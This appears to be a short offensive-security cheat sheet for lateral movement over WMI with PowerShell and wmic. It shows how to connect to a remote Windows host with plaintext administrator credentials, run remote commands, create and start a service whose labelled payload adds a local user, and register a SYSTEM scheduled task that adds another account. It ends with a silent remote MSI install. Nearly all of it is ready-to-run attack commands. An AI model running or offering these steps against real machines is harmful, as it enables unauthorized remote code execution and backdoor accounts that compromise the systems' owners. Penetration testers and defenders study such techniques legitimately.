WMI

Connecting to WMI from PowerShell

Example: Establish a connection to a remote computer named 192.168.1.10 using the credentials Administrator and MySecurePass.

$username = 'Administrator';
$password = 'MySecurePass';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

# Establish a session using DCOM protocol
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName 192.168.1.10 -Credential $credential -SessionOption $Opt -ErrorAction Stop

---

1. Remote Process Creation Using WMI

Example: Create a remote process to write to a text file (munrawashere.txt) on a target computer (192.168.1.10).

# Define the command to execute remotely
$Command = "powershell.exe -Command Set-Content -Path C:\munrawashere.txt -Value 'This file was created remotely'";

# Execute the command remotely
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = $Command
}

Alternatively, using wmic:

wmic /node:192.168.1.10 /user:Administrator /password:MySecurePass process call create "cmd.exe /c echo Remote file created > C:\munrawashere.txt"

---

2. Creating Services Remotely with WMI

Example: Create a service named TestService that runs the payload net user remoteuser Password123 /add on a target computer.

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
    Name = "TestService";
    DisplayName = "Remote Test Service";
    PathName = "net user remoteuser Password123 /add"; # Payload
    ServiceType = [byte]::Parse("16"); # Win32OwnProcess
    StartMode = "Manual"
}

# Start the service
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -Filter "Name='TestService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService

To stop and delete the service:

Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete

---

3. Creating Scheduled Tasks Remotely with WMI

Example: Create a scheduled task that adds a user (scheduleduser) to the system.

# Define the task command and arguments
$Command = "cmd.exe"
$Args = "/c net user scheduleduser Pass1234 /add"

# Create and register the task
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "RemoteTask"

# Start the task
Start-ScheduledTask -CimSession $Session -TaskName "RemoteTask"

# Unregister the task after execution
Unregister-ScheduledTask -CimSession $Session -TaskName "RemoteTask"

---

4. Installing MSI Packages Through WMI

Example: Install an MSI package named example.msi located in C:\Windows on a remote computer.

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{
    PackageLocation = "C:\Windows\example.msi";
    Options = "/quiet"; # Silent installation
    AllUsers = $false
}

Using wmic:

wmic /node:192.168.1.10 /user:Administrator /password:MySecurePass product call install PackageLocation="C:\Windows\example.msi"